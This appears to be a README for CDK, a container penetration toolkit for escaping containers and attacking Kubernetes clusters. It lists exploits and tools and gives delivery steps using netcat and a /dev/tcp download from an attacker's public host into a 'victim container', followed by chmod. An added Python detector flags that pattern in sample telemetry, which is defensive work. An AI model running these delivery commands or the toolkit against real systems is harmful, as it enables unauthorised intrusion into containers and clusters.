Usage of CDK for attacking targets without prior mutual consent is illegal.
CDK is for security testing purposes only.
## Overview
CDK is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs, and helps you escape containers and take over K8s clusters easily.
## Installation/Delivery
Download the latest release from https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
### TIPS: Deliver CDK into target container in real-world penetration testing
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have an RCE exploit, but the target container has no `curl` or `wget`, you can use the following method to deliver CDK:
1. First, serve the CDK binary from your own host with a public IP.
```
# on your host
nc -lvp 999 < cdk
```
2. Inside the victim container, execute:
```
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
```
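Seen from the defending side, this delivery starts no `curl` or `wget` process in the container: the shell itself opens the connection, so the trace is a `/dev/tcp` redirection in a command line, typically followed by a `chmod` that adds the execute bit. The following added example (not part of CDK; the event format, container names and log lines are constructed for illustration) flags that sequence in process command-line telemetry.

```python
import posixpath
import re

# Shell network redirection, optionally written to a file: `< /dev/tcp/HOST/PORT > FILE`
DEVTCP_READ = re.compile(
    r"<>?\s*/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)"
    r"(?:\s*>\s*(?P<out>[^\s;&|]+))?")
# chmod with a symbolic (a+x, u=rwx) or octal (755) mode and its first target
CHMOD = re.compile(
    r"\bchmod\s+(?P<mode>[ugoa]*[+=][rwxXst]+|[0-7]{3,4})\s+(?P<file>[^\s;&|]+)")

def adds_exec(mode):
    """True when the chmod mode sets an execute bit."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode

def detect_devtcp_delivery(events):
    """events: (container_id, cmdline) tuples in time order. A /dev/tcp redirection is
    'medium'; 'high' once the file it wrote is made executable in the same container."""
    findings, written = [], {}
    for container, cmdline in events:
        m = DEVTCP_READ.search(cmdline)
        if m:
            out = posixpath.normpath(m["out"]) if m["out"] else None
            hit = {"container": container, "host": m["host"],
                   "port": int(m["port"]), "file": out, "severity": "medium"}
            findings.append(hit)
            if out:
                written[(container, out)] = hit
        for c in CHMOD.finditer(cmdline):
            key = (container, posixpath.normpath(c["file"]))
            if adds_exec(c["mode"]) and key in written:
                written[key]["severity"] = "high"
    return findings

# Constructed sample telemetry (not real logs); 203.0.113.10 is a documentation address
SAMPLE_EVENTS = [
    ("web-7f9c", "sh -c id"),
    ("web-7f9c", "bash -c cat < /dev/tcp/203.0.113.10/999 > cdk"),
    ("web-7f9c", "chmod a+x ./cdk"),
    ("db-41aa", "bash -c exec 3<>/dev/tcp/10.0.0.5/5432"),
    ("db-41aa", "chmod 644 backup.sql"),
]

if __name__ == "__main__":
    for finding in detect_devtcp_delivery(SAMPLE_EVENTS):
        print(finding)
```

The redirection is only visible when the telemetry captures the shell's command string, for example as the argument of `bash -c`. Pair this with a network rule for shell processes that open outbound connections.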
## Usage
```
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
```

|Escaping|Read arbitrary file from host system (CAP_DAC_READ_SEARCH)|cap-dac-read-search|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)|

**Note about Thin:** The **thin release** is prepared for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK functions. You can also pick useful exploits from the CDK source code to build your own lightweight binary.
### Tool Module
The tools run like their Linux counterparts, with slightly different input arguments; see the usage link.
If you want to know how we release a new version, how thin is produced, why we provide upx versions, what the differences between the all, normal, thin and upx versions are, and how to choose specific CDK exploits and tools to compile your own release, please check the [Release Document](https://github.com/cdk-team/CDK/wiki/Release).
## Developer Docs
* [Run test in container](https://github.com/cdk-team/CDK/wiki/Run-Test)
## Contributing to CDK
First off, thanks for taking the time to contribute!
By reporting any issues, ideas or PRs, your GitHub ID will be listed here.
Bugs are tracked as [GitHub Issues](https://github.com/cdk-team/CDK/issues). Create an issue with the current CDK version, the error message and the environment. Describe the exact steps that reproduce the problem.
#### Suggesting Enhancements
Enhancement suggestions are tracked as [GitHub Discussions](https://github.com/cdk-team/CDK/discussions). You can publish any thoughts here to discuss with developers directly.
#### Pull Requests
Fix problems or maintain CDK's quality:
* Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
* Screenshots or logs of a run before and after you fix the problem.
New feature or exploits:
* Explain why this enhancement would be useful to other users.
* Please enable a sustainable environment for us to review contributions.
* Screenshots about how this new feature works.
* If you are committing new evaluate/exploit scripts, please add a simple doc to your PR message; here is an [example](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy).